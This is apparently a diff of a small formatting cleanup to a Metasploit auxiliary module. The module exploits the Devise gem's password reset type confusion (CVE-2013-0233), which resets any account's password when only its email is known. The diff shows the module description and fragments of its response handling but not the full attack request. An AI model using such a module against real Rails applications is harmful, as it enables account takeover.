@@ -13,12 +13,12 @@ class Metasploit3 < Msf::Auxiliary
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' => 'Rails Devise authentication gem Password Reset' ,
16
+ 'Name' => 'Rails Devise Authentication Gem Password Reset' ,
17
17
'Description' => %q{
18
18
The Devise authentication gem for Ruby on Rails is vulnerable
19
- to a password reset exploit leveraging type confusion. By submitting XML
19
+ to a password reset exploit leveraging type confusion. By submitting XML
20
20
to rails, we can influence the type used for the reset_password_token
21
- parameter. This allows for resetting passwords of arbitrary accounts,
21
+ parameter. This allows for resetting passwords of arbitrary accounts,
22
22
knowing only the associated email address.
23
23
24
24
This module defaults to the most common devise URIs and response values,
@@ -37,7 +37,7 @@ def initialize(info = {})
37
37
'License' => MSF_LICENSE ,
38
38
'References' =>
39
39
[
40
- [ 'CVE' , 'CVE- 2013-0233' ] ,
40
+ [ 'CVE' , '2013-0233' ] ,
41
41
[ 'URL' , 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/' ] ,
42
42
[ 'URL' , 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html' ] ,
43
43
] ,
@@ -99,7 +99,7 @@ def reset_one(password, report=false)
99
99
100
100
#binding.pry if report
101
101
102
- case res . code
102
+ case res . code
103
103
when 200
104
104
# Failure, grab the error text
105
105
# May need to tweak this for some apps...
@@ -112,7 +112,7 @@ def reset_one(password, report=false)
112
112
when 302
113
113
#Success!
114
114
return true
115
- else
115
+ else
116
116
print_error ( "ERROR: received code #{ res . code } " )
117
117
return false
118
118
end
0 commit comments